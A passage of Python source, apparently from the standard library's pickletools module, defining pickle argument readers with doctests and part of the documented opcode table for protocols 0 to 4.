doc="Eight-byte unsigned integer, little-endian.")
def read_stringnl(f, decode=True, stripquotes=True):
r"""
>>> import io
>>> read_stringnl(io.BytesIO(b"'abcd'\nefg\n"))
'abcd'
>>> read_stringnl(io.BytesIO(b"\n"))
Traceback (most recent call last):
...
ValueError: no string quotes around b''
>>> read_stringnl(io.BytesIO(b"\n"), stripquotes=False)
''
>>> read_stringnl(io.BytesIO(b"''\n"))
''
>>> read_stringnl(io.BytesIO(b'"abcd"'))
Traceback (most recent call last):
...
ValueError: no newline found when trying to read stringnl
Embedded escapes are undone in the result.
>>> read_stringnl(io.BytesIO(br"'a\n\\b\x00c\td'" + b"\n'e'"))
'a\n\\b\x00c\td'
"""
data = f.readline()
if not data.endswith(b'\n'):
raise ValueError("no newline found when trying to read stringnl")
data = data[:-1] # lose the newline
if stripquotes:
for q in (b'"', b"'"):
if data.startswith(q):
if not data.endswith(q):
raise ValueError("strinq quote %r not found at both "
"ends of %r" % (q, data))
data = data[1:-1]
break
else:
raise ValueError("no string quotes around %r" % data)
if decode:
data = codecs.escape_decode(data)[0].decode("ascii")
return data
stringnl = ArgumentDescriptor(
name='stringnl',
n=UP_TO_NEWLINE,
reader=read_stringnl,
doc="""A newline-terminated string.
This is a repr-style string, with embedded escapes, and
bracketing quotes.
""")
def read_stringnl_noescape(f):
return read_stringnl(f, stripquotes=False)
stringnl_noescape = ArgumentDescriptor(
name='stringnl_noescape',
n=UP_TO_NEWLINE,
reader=read_stringnl_noescape,
doc="""A newline-terminated string.
This is a str-style string, without embedded escapes,
or bracketing quotes. It should consist solely of
printable ASCII characters.
""")
def read_stringnl_noescape_pair(f):
r"""
>>> import io
>>> read_stringnl_noescape_pair(io.BytesIO(b"Queue\nEmpty\njunk"))
'Queue Empty'
"""
return "%s %s" % (read_stringnl_noescape(f), read_stringnl_noescape(f))
stringnl_noescape_pair = ArgumentDescriptor(
name='stringnl_noescape_pair',
n=UP_TO_NEWLINE,
reader=read_stringnl_noescape_pair,
doc="""A pair of newline-terminated strings.
These are str-style strings, without embedded
escapes, or bracketing quotes. They should
consist solely of printable ASCII characters.
The pair is returned as a single string, with
a single blank separating the two strings.
""")
def read_string1(f):
r"""
>>> import io
>>> read_string1(io.BytesIO(b"\x00"))
''
>>> read_string1(io.BytesIO(b"\x03abcdef"))
'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data.decode("latin-1")
raise ValueError("expected %d bytes in a string1, but only %d remain" %
(n, len(data)))
string1 = ArgumentDescriptor(
name="string1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_string1,
doc="""A counted string.
The first argument is a 1-byte unsigned int giving the number
of bytes in the string, and the second argument is that many
bytes.
""")
def read_string4(f):
r"""
>>> import io
>>> read_string4(io.BytesIO(b"\x00\x00\x00\x00abc"))
''
>>> read_string4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
'abc'
>>> read_string4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
Traceback (most recent call last):
...
ValueError: expected 50331648 bytes in a string4, but only 6 remain
"""
n = read_int4(f)
if n < 0:
raise ValueError("string4 byte count < 0: %d" % n)
data = f.read(n)
if len(data) == n:
return data.decode("latin-1")
raise ValueError("expected %d bytes in a string4, but only %d remain" %
(n, len(data)))
string4 = ArgumentDescriptor(
name="string4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_string4,
doc="""A counted string.
The first argument is a 4-byte little-endian signed int giving
the number of bytes in the string, and the second argument is
that many bytes.
""")
def read_bytes1(f):
r"""
>>> import io
>>> read_bytes1(io.BytesIO(b"\x00"))
b''
>>> read_bytes1(io.BytesIO(b"\x03abcdef"))
b'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
(n, len(data)))
bytes1 = ArgumentDescriptor(
name="bytes1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_bytes1,
doc="""A counted bytes string.
The first argument is a 1-byte unsigned int giving the number
of bytes in the string, and the second argument is that many
bytes.
""")
def read_bytes1(f):
r"""
>>> import io
>>> read_bytes1(io.BytesIO(b"\x00"))
b''
>>> read_bytes1(io.BytesIO(b"\x03abcdef"))
b'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
(n, len(data)))
bytes1 = ArgumentDescriptor(
name="bytes1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_bytes1,
doc="""A counted bytes string.
The first argument is a 1-byte unsigned int giving the number
of bytes, and the second argument is that many bytes.
""")
def read_bytes4(f):
r"""
>>> import io
>>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x00abc"))
b''
>>> read_bytes4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
b'abc'
>>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
Traceback (most recent call last):
...
ValueError: expected 50331648 bytes in a bytes4, but only 6 remain
"""
n = read_uint4(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("bytes4 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes4, but only %d remain" %
(n, len(data)))
bytes4 = ArgumentDescriptor(
name="bytes4",
n=TAKEN_FROM_ARGUMENT4U,
reader=read_bytes4,
doc="""A counted bytes string.
The first argument is a 4-byte little-endian unsigned int giving
the number of bytes, and the second argument is that many bytes.
""")
def read_bytes8(f):
r"""
>>> import io, struct, sys
>>> read_bytes8(io.BytesIO(b"\x00\x00\x00\x00\x00\x00\x00\x00abc"))
b''
>>> read_bytes8(io.BytesIO(b"\x03\x00\x00\x00\x00\x00\x00\x00abcdef"))
b'abc'
>>> bigsize8 = struct.pack("<Q", sys.maxsize//3)
>>> read_bytes8(io.BytesIO(bigsize8 + b"abcdef")) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: expected ... bytes in a bytes8, but only 6 remain
"""
n = read_uint8(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("bytes8 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes8, but only %d remain" %
(n, len(data)))
bytes8 = ArgumentDescriptor(
name="bytes8",
n=TAKEN_FROM_ARGUMENT8U,
reader=read_bytes8,
doc="""A counted bytes string.
The first argument is an 8-byte little-endian unsigned int giving
the number of bytes, and the second argument is that many bytes.
""")
def read_unicodestringnl(f):
r"""
>>> import io
>>> read_unicodestringnl(io.BytesIO(b"abc\\uabcd\njunk")) == 'abc\uabcd'
True
"""
data = f.readline()
if not data.endswith(b'\n'):
raise ValueError("no newline found when trying to read "
"unicodestringnl")
data = data[:-1] # lose the newline
return str(data, 'raw-unicode-escape')
unicodestringnl = ArgumentDescriptor(
name='unicodestringnl',
n=UP_TO_NEWLINE,
reader=read_unicodestringnl,
doc="""A newline-terminated Unicode string.
This is raw-unicode-escape encoded, so consists of
printable ASCII characters, and may contain embedded
escape sequences.
""")
def read_unicodestring1(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc)]) # little-endian 1-byte length
>>> t = read_unicodestring1(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring1(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring1, but only 6 remain
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring1, but only %d "
"remain" % (n, len(data)))
unicodestring1 = ArgumentDescriptor(
name="unicodestring1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_unicodestring1,
doc="""A counted Unicode string.
The first argument is a 1-byte little-endian signed int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_unicodestring4(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc), 0, 0, 0]) # little-endian 4-byte length
>>> t = read_unicodestring4(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring4(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring4, but only 6 remain
"""
n = read_uint4(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("unicodestring4 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring4, but only %d "
"remain" % (n, len(data)))
unicodestring4 = ArgumentDescriptor(
name="unicodestring4",
n=TAKEN_FROM_ARGUMENT4U,
reader=read_unicodestring4,
doc="""A counted Unicode string.
The first argument is a 4-byte little-endian signed int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_unicodestring8(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc)]) + b'\0' * 7 # little-endian 8-byte length
>>> t = read_unicodestring8(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring8(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring8, but only 6 remain
"""
n = read_uint8(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("unicodestring8 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring8, but only %d "
"remain" % (n, len(data)))
unicodestring8 = ArgumentDescriptor(
name="unicodestring8",
n=TAKEN_FROM_ARGUMENT8U,
reader=read_unicodestring8,
doc="""A counted Unicode string.
The first argument is an 8-byte little-endian signed int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_decimalnl_short(f):
r"""
>>> import io
>>> read_decimalnl_short(io.BytesIO(b"1234\n56"))
1234
>>> read_decimalnl_short(io.BytesIO(b"1234L\n56"))
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: b'1234L'
"""
s = read_stringnl(f, decode=False, stripquotes=False)
# There's a hack for True and False here.
if s == b"00":
return False
elif s == b"01":
return True
return int(s)
def read_decimalnl_long(f):
r"""
>>> import io
>>> read_decimalnl_long(io.BytesIO(b"1234L\n56"))
1234
>>> read_decimalnl_long(io.BytesIO(b"123456789012345678901234L\n6"))
123456789012345678901234
"""
s = read_stringnl(f, decode=False, stripquotes=False)
if s[-1:] == b'L':
s = s[:-1]
return int(s)
decimalnl_short = ArgumentDescriptor(
name='decimalnl_short',
n=UP_TO_NEWLINE,
reader=read_decimalnl_short,
doc="""A newline-terminated decimal integer literal.
This never has a trailing 'L', and the integer fit
in a short Python int on the box where the pickle
was written -- but there's no guarantee it will fit
in a short Python int on the box where the pickle
is read.
""")
decimalnl_long = ArgumentDescriptor(
name='decimalnl_long',
n=UP_TO_NEWLINE,
reader=read_decimalnl_long,
doc="""A newline-terminated decimal integer literal.
This has a trailing 'L', and can represent integers
of any size.
""")
def read_floatnl(f):
r"""
>>> import io
>>> read_floatnl(io.BytesIO(b"-1.25\n6"))
-1.25
"""
s = read_stringnl(f, decode=False, stripquotes=False)
return float(s)
floatnl = ArgumentDescriptor(
name='floatnl',
n=UP_TO_NEWLINE,
reader=read_floatnl,
doc="""A newline-terminated decimal floating literal.
In general this requires 17 significant digits for roundtrip
identity, and pickling then unpickling infinities, NaNs, and
minus zero doesn't work across boxes, or on some boxes even
on itself (e.g., Windows can't read the strings it produces
for infinities or NaNs).
""")
def read_float8(f):
r"""
>>> import io, struct
>>> raw = struct.pack(">d", -1.25)
>>> raw
b'\xbf\xf4\x00\x00\x00\x00\x00\x00'
>>> read_float8(io.BytesIO(raw + b"\n"))
-1.25
"""
data = f.read(8)
if len(data) == 8:
return _unpack(">d", data)[0]
raise ValueError("not enough data in stream to read float8")
float8 = ArgumentDescriptor(
name='float8',
n=8,
reader=read_float8,
doc="""An 8-byte binary representation of a float, big-endian.
The format is unique to Python, and shared with the struct
module (format string '>d') "in theory" (the struct and pickle
implementations don't share the code -- they should). It's
strongly related to the IEEE-754 double format, and, in normal
cases, is in fact identical to the big-endian 754 double format.
On other boxes the dynamic range is limited to that of a 754
double, and "add a half and chop" rounding is used to reduce
the precision to 53 bits. However, even on a 754 box,
infinities, NaNs, and minus zero may not be handled correctly
(may not survive roundtrip pickling intact).
""")
from pickle import decode_long
def read_long1(f):
r"""
>>> import io
>>> read_long1(io.BytesIO(b"\x00"))
0
>>> read_long1(io.BytesIO(b"\x02\xff\x00"))
255
>>> read_long1(io.BytesIO(b"\x02\xff\x7f"))
32767
>>> read_long1(io.BytesIO(b"\x02\x00\xff"))
-256
>>> read_long1(io.BytesIO(b"\x02\x00\x80"))
-32768
"""
n = read_uint1(f)
data = f.read(n)
if len(data) != n:
raise ValueError("not enough data in stream to read long1")
return decode_long(data)
long1 = ArgumentDescriptor(
name="long1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_long1,
doc="""A binary long, little-endian, using 1-byte size.
This first reads one byte as an unsigned size, then reads that
many bytes and interprets them as a little-endian 2's-complement long.
If the size is 0, that's taken as a shortcut for the long 0L.
""")
def read_long4(f):
r"""
>>> import io
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x00"))
255
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x7f"))
32767
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\xff"))
-256
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\x80"))
-32768
>>> read_long1(io.BytesIO(b"\x00\x00\x00\x00"))
0
"""
n = read_int4(f)
if n < 0:
raise ValueError("long4 byte count < 0: %d" % n)
data = f.read(n)
if len(data) != n:
raise ValueError("not enough data in stream to read long4")
return decode_long(data)
long4 = ArgumentDescriptor(
name="long4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_long4,
doc="""A binary representation of a long, little-endian.
This first reads four bytes as a signed size (but requires the
size to be >= 0), then reads that many bytes and interprets them
as a little-endian 2's-complement long. If the size is 0, that's taken
as a shortcut for the int 0, although LONG1 should really be used
then instead (and in any case where # of bytes < 256).
""")
class StackObject(object):
__slots__ = (
# name of descriptor record, for info only
'name',
# type of object, or tuple of type objects (meaning the object can
# be of any type in the tuple)
'obtype',
# human-readable docs for this kind of stack object; a string
'doc',
)
def __init__(self, name, obtype, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(obtype, type) or isinstance(obtype, tuple)
if isinstance(obtype, tuple):
for contained in obtype:
assert isinstance(contained, type)
self.obtype = obtype
assert isinstance(doc, str)
self.doc = doc
def __repr__(self):
return self.name
pyint = pylong = StackObject(
name='int',
obtype=int,
doc="A Python integer object.")
pyinteger_or_bool = StackObject(
name='int_or_bool',
obtype=(int, bool),
doc="A Python integer or boolean object.")
pybool = StackObject(
name='bool',
obtype=bool,
doc="A Python boolean object.")
pyfloat = StackObject(
name='float',
obtype=float,
doc="A Python float object.")
pybytes_or_str = pystring = StackObject(
name='bytes_or_str',
obtype=(bytes, str),
doc="A Python bytes or (Unicode) string object.")
pybytes = StackObject(
name='bytes',
obtype=bytes,
doc="A Python bytes object.")
pyunicode = StackObject(
name='str',
obtype=str,
doc="A Python (Unicode) string object.")
pynone = StackObject(
name="None",
obtype=type(None),
doc="The Python None object.")
pytuple = StackObject(
name="tuple",
obtype=tuple,
doc="A Python tuple object.")
pylist = StackObject(
name="list",
obtype=list,
doc="A Python list object.")
pydict = StackObject(
name="dict",
obtype=dict,
doc="A Python dict object.")
pyset = StackObject(
name="set",
obtype=set,
doc="A Python set object.")
pyfrozenset = StackObject(
name="frozenset",
obtype=set,
doc="A Python frozenset object.")
anyobject = StackObject(
name='any',
obtype=object,
doc="Any kind of object whatsoever.")
markobject = StackObject(
name="mark",
obtype=StackObject,
doc="""'The mark' is a unique object.
Opcodes that operate on a variable number of objects
generally don't embed the count of objects in the opcode,
or pull it off the stack. Instead the MARK opcode is used
to push a special marker object on the stack, and then
some other opcodes grab all the objects from the top of
the stack down to (but not including) the topmost marker
object.
""")
stackslice = StackObject(
name="stackslice",
obtype=StackObject,
doc="""An object representing a contiguous slice of the stack.
This is used in conjunction with markobject, to represent all
of the stack following the topmost markobject. For example,
the POP_MARK opcode changes the stack from
[..., markobject, stackslice]
to
[...]
No matter how many object are on the stack after the topmost
markobject, POP_MARK gets rid of all of them (including the
topmost markobject too).
""")
class OpcodeInfo(object):
__slots__ = (
# symbolic name of opcode; a string
'name',
# the code used in a bytestream to represent the opcode; a
# one-character string
'code',
# If the opcode has an argument embedded in the byte string, an
# instance of ArgumentDescriptor specifying its type. Note that
# arg.reader(s) can be used to read and decode the argument from
# the bytestream s, and arg.doc documents the format of the raw
# argument bytes. If the opcode doesn't have an argument embedded
# in the bytestream, arg should be None.
'arg',
# what the stack looks like before this opcode runs; a list
'stack_before',
# what the stack looks like after this opcode runs; a list
'stack_after',
# the protocol number in which this opcode was introduced; an int
'proto',
# human-readable docs for this opcode; a string
'doc',
)
def __init__(self, name, code, arg,
stack_before, stack_after, proto, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(code, str)
assert len(code) == 1
self.code = code
assert arg is None or isinstance(arg, ArgumentDescriptor)
self.arg = arg
assert isinstance(stack_before, list)
for x in stack_before:
assert isinstance(x, StackObject)
self.stack_before = stack_before
assert isinstance(stack_after, list)
for x in stack_after:
assert isinstance(x, StackObject)
self.stack_after = stack_after
assert isinstance(proto, int) and 0 <= proto <= pickle.HIGHEST_PROTOCOL
self.proto = proto
assert isinstance(doc, str)
self.doc = doc
I = OpcodeInfo
opcodes = [
# Ways to spell integers.
I(name='INT',
code='I',
arg=decimalnl_short,
stack_before=[],
stack_after=[pyinteger_or_bool],
proto=0,
doc="""Push an integer or bool.
The argument is a newline-terminated decimal literal string.
The intent may have been that this always fit in a short Python int,
but INT can be generated in pickles written on a 64-bit box that
require a Python long on a 32-bit box. The difference between this
and LONG then is that INT skips a trailing 'L', and produces a short
int whenever possible.
Another difference is due to that, when bool was introduced as a
distinct type in 2.3, builtin names True and False were also added to
2.2.2, mapping to ints 1 and 0. For compatibility in both directions,
True gets pickled as INT + "I01\\n", and False as INT + "I00\\n".
Leading zeroes are never produced for a genuine integer. The 2.3
(and later) unpicklers special-case these and return bool instead;
earlier unpicklers ignore the leading "0" and return the int.
"""),
I(name='BININT',
code='J',
arg=int4,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a four-byte signed integer.
This handles the full range of Python (short) integers on a 32-bit
box, directly as binary bytes (1 for the opcode and 4 for the integer).
If the integer is non-negative and fits in 1 or 2 bytes, pickling via
BININT1 or BININT2 saves space.
"""),
I(name='BININT1',
code='K',
arg=uint1,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a one-byte unsigned integer.
This is a space optimization for pickling very small non-negative ints,
in range(256).
"""),
I(name='BININT2',
code='M',
arg=uint2,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a two-byte unsigned integer.
This is a space optimization for pickling small positive ints, in
range(256, 2**16). Integers in range(256) can also be pickled via
BININT2, but BININT1 instead saves a byte.
"""),
I(name='LONG',
code='L',
arg=decimalnl_long,
stack_before=[],
stack_after=[pyint],
proto=0,
doc="""Push a long integer.
The same as INT, except that the literal ends with 'L', and always
unpickles to a Python long. There doesn't seem a real purpose to the
trailing 'L'.
Note that LONG takes time quadratic in the number of digits when
unpickling (this is simply due to the nature of decimal->binary
conversion). Proto 2 added linear-time (in C; still quadratic-time
in Python) LONG1 and LONG4 opcodes.
"""),
I(name="LONG1",
code='\x8a',
arg=long1,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using one-byte length.
A more efficient encoding of a Python long; the long1 encoding
says it all."""),
I(name="LONG4",
code='\x8b',
arg=long4,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using found-byte length.
A more efficient encoding of a Python long; the long4 encoding
says it all."""),
# Ways to spell strings (8-bit, not Unicode).
I(name='STRING',
code='S',
arg=stringnl,
stack_before=[],
stack_after=[pybytes_or_str],
proto=0,
doc="""Push a Python string object.
The argument is a repr-style string, with bracketing quote characters,
and perhaps embedded escapes. The argument extends until the next
newline character. These are usually decoded into a str instance
using the encoding given to the Unpickler constructor. or the default,
'ASCII'. If the encoding given was 'bytes' however, they will be
decoded as bytes object instead.
"""),
I(name='BINSTRING',
code='T',
arg=string4,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 4-byte little-endian
signed int giving the number of bytes in the string, and the
second is that many bytes, which are taken literally as the string
content. These are usually decoded into a str instance using the
encoding given to the Unpickler constructor. or the default,
'ASCII'. If the encoding given was 'bytes' however, they will be
decoded as bytes object instead.
"""),
I(name='SHORT_BINSTRING',
code='U',
arg=string1,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes in the string, and the second is that many
bytes, which are taken literally as the string content. These are
usually decoded into a str instance using the encoding given to
the Unpickler constructor. or the default, 'ASCII'. If the
encoding given was 'bytes' however, they will be decoded as bytes
object instead.
"""),
# Bytes (protocol 3 only; older protocols don't support bytes at all)
I(name='BINBYTES',
code='B',
arg=bytes4,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes, and the second is that many bytes, which are
taken literally as the bytes content.
"""),
I(name='SHORT_BINBYTES',
code='C',
arg=bytes1,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes, and the second is that many bytes, which are taken
literally as the string content.
"""),
I(name='BINBYTES8',
code='\x8e',
arg=bytes8,
stack_before=[],
stack_after=[pybytes],
proto=4,
doc="""Push a Python bytes object.
There are two arguments: the first is an 8-byte unsigned int giving
the number of bytes in the string, and the second is that many bytes,
which are taken literally as the string content.
"""),
# Ways to spell None.
I(name='NONE',
code='N',
arg=None,
stack_before=[],
stack_after=[pynone],
proto=0,
doc="Push None on the stack."),
# Ways to spell bools, starting with proto 2. See INT for how this was
# done before proto 2.
I(name='NEWTRUE',
code='\x88',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push True onto the stack."""),
I(name='NEWFALSE',
code='\x89',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push False onto the stack."""),
# Ways to spell Unicode strings.
I(name='UNICODE',
code='V',
arg=unicodestringnl,
stack_before=[],
stack_after=[pyunicode],
proto=0, # this may be pure-text, but it's a later addition
doc="""Push a Python Unicode string object.
The argument is a raw-unicode-escape encoding of a Unicode string,
and so may contain embedded escape sequences. The argument extends
until the next newline character.
"""),
I(name='SHORT_BINUNICODE',
code='\x8c',
arg=unicodestring1,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 1-byte little-endian signed int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE',
code='X',
arg=unicodestring4,
stack_before=[],
stack_after=[pyunicode],
proto=1,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE8',
code='\x8d',
arg=unicodestring8,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is an 8-byte little-endian signed int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
# Ways to spell floats.
I(name='FLOAT',
code='F',
arg=floatnl,
stack_before=[],
stack_after=[pyfloat],
proto=0,
doc="""Newline-terminated decimal float literal.
The argument is repr(a_float), and in general requires 17 significant
digits for roundtrip conversion to be an identity (this is so for
IEEE-754 double precision values, which is what Python float maps to
on most boxes).
In general, FLOAT cannot be used to transport infinities, NaNs, or
minus zero across boxes (or even on a single box, if the platform C
library can't read the strings it produces for such things -- Windows
is like that), but may do less damage than BINFLOAT on boxes with
greater precision or dynamic range than IEEE-754 double.
"""),
I(name='BINFLOAT',
code='G',
arg=float8,
stack_before=[],
stack_after=[pyfloat],
proto=1,
doc="""Float stored in binary form, with 8 bytes of data.
This generally requires less than half the space of FLOAT encoding.
In general, BINFLOAT cannot be used to transport infinities, NaNs, or
minus zero, raises an exception if the exponent exceeds the range of
an IEEE-754 double, and retains no more than 53 bits of precision (if
there are more than that, "add a half and chop" rounding is used to
cut it back to 53 significant bits).
"""),
# Ways to build lists.
I(name='EMPTY_LIST',
code=']',
arg=None,
stack_before=[],
stack_after=[pylist],
proto=1,
doc="Push an empty list."),
I(name='APPEND',
code='a',
arg=None,
stack_before=[pylist, anyobject],
stack_after=[pylist],
proto=0,
doc="""Append an object to a list.
Stack before: ... pylist anyobject
Stack after: ... pylist+[anyobject]
although pylist is really extended in-place.
"""),
I(name='APPENDS',
code='e',
arg=None,
stack_before=[pylist, markobject, stackslice],
stack_after=[pylist],
proto=1,
doc="""Extend a list by a slice of stack objects.
Stack before: ... pylist markobject stackslice
Stack after: ... pylist+stackslice
although pylist is really extended in-place.
"""),
I(name='LIST',
code='l',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pylist],
proto=0,
doc="""Build a list out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python list, which single list object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... [1, 2, 3, 'abc']
"""),
# Ways to build tuples.
I(name='EMPTY_TUPLE',
code=')',
arg=None,
stack_before=[],
stack_after=[pytuple],
proto=1,
doc="Push an empty tuple."),
I(name='TUPLE',
code='t',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pytuple],
proto=0,
doc="""Build a tuple out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python tuple, which single tuple object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... (1, 2, 3, 'abc')
"""),
I(name='TUPLE1',
code='\x85',
arg=None,
stack_before=[anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a one-tuple out of the topmost item on the stack.
This code pops one value off the stack and pushes a tuple of
length 1 whose one item is that value back onto it. In other
words:
stack[-1] = tuple(stack[-1:])
"""),
I(name='TUPLE2',
code='\x86',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a two-tuple out of the top two items on the stack.
This code pops two values off the stack and pushes a tuple of
length 2 whose items are those values back onto it. In other
words:
stack[-2:] = [tuple(stack[-2:])]
"""),
I(name='TUPLE3',
code='\x87',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a three-tuple out of the top three items on the stack.
This code pops three values off the stack and pushes a tuple of
length 3 whose items are those values back onto it. In other
words:
stack[-3:] = [tuple(stack[-3:])]
"""),
# Ways to build dicts.
I(name='EMPTY_DICT',
code='}',
arg=None,
stack_before=[],
stack_after=[pydict],
proto=1,
doc="Push an empty dict."),
I(name='DICT',
code='d',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pydict],
proto=0,
doc="""Build a dict out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python dict, which single dict object replaces all of the
stack from the topmost markobject onward. The stack slice alternates
key, value, key, value, .... For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... {1: 2, 3: 'abc'}
"""),
I(name='SETITEM',
code='s',
arg=None,
stack_before=[pydict, anyobject, anyobject],
stack_after=[pydict],
proto=0,
doc="""Add a key+value pair to an existing dict.
Stack before: ... pydict key value
Stack after: ... pydict
where pydict has been modified via pydict[key] = value.
"""),
I(name='SETITEMS',
code='u',
arg=None,
stack_before=[pydict, markobject, stackslice],
stack_after=[pydict],
proto=1,
doc="""Add an arbitrary number of key+value pairs to an existing dict.
The slice of the stack following the topmost markobject is taken as
an alternating sequence of keys and values, added to the dict
immediately under the topmost markobject. Everything at and after the
topmost markobject is popped, leaving the mutated dict at the top
of the stack.
Stack before: ... pydict markobject key_1 value_1 ... key_n value_n
Stack after: ... pydict
where pydict has been modified via pydict[key_i] = value_i for i in
1, 2, ..., n, and in that order.
"""),
# Ways to build sets
I(name='EMPTY_SET',
code='\x8f',
arg=None,
stack_before=[],
stack_after=[pyset],
proto=4,
doc="Push an empty set."),
I(name='ADDITEMS',
code='\x90',
arg=None,
stack_before=[pyset, markobject, stackslice],
stack_after=[pyset],
proto=4,
doc="""Add an arbitrary number of items to an existing set.
The slice of the stack following the topmost markobject is taken as
a sequence of items, added to the set immediately under the topmost
markobject. Everything at and after the topmost markobject is popped,
leaving the mutated set at the top of the stack.
Stack before: ... pyset markobject item_1 ... item_n
Stack after: ... pyset
where pyset has been modified via pyset.add(item_i) = item_i for i in
1, 2, ..., n, and in that order.
"""),
# Way to build frozensets
I(name='FROZENSET',
code='\x91',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pyfrozenset],
proto=4,
doc="""Build a frozenset out of the topmost slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python frozenset, which single frozenset object replaces all
of the stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3
